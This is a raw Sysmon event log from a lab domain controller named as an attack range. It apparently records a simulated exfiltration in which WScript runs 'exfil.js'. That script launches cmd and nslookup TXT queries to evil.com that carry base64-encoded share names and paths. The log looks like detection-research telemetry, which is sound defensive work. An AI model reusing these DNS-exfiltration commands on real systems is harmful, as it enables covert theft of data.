10341000x8000000000000000195589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-17A1-629A-783D-000000005F02}55523968C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-573E-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.601{2E1864BB-17AB-629A-573E-000000005F02}2608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltlcem.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlanplr.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-17AB-629A-553E-000000005F02}52327416C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-563E-000000005F02}5064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-563E-000000005F02}5064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.543{2E1864BB-17AB-629A-543E-000000005F02}54362240C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-563E-000000005F02}5064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.552{2E1864BB-17AB-629A-563E-000000005F02}5064C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-543E-000000005F02}5436C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanplr.tmp 2>&1 10341000x8000000000000000195577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.527{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-553E-000000005F02}5232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.527{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-553E-000000005F02}5232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.511{2E1864BB-17AB-629A-553E-000000005F02}52327416C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-543E-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.506{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-553E-000000005F02}5232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000195573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.867{00000000-0000-0000-0000-000000000000}6560evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.745{00000000-0000-0000-0000-000000000000}7260evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.657{00000000-0000-0000-0000-000000000000}7832evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000195570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-543E-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.489{2E1864BB-17A1-629A-783D-000000005F02}55527644C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-543E-000000005F02}5436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.495{2E1864BB-17AB-629A-543E-000000005F02}5436C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanplr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.474{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlegf.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-17AB-629A-523E-000000005F02}76321300C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-533E-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.443{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-533E-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 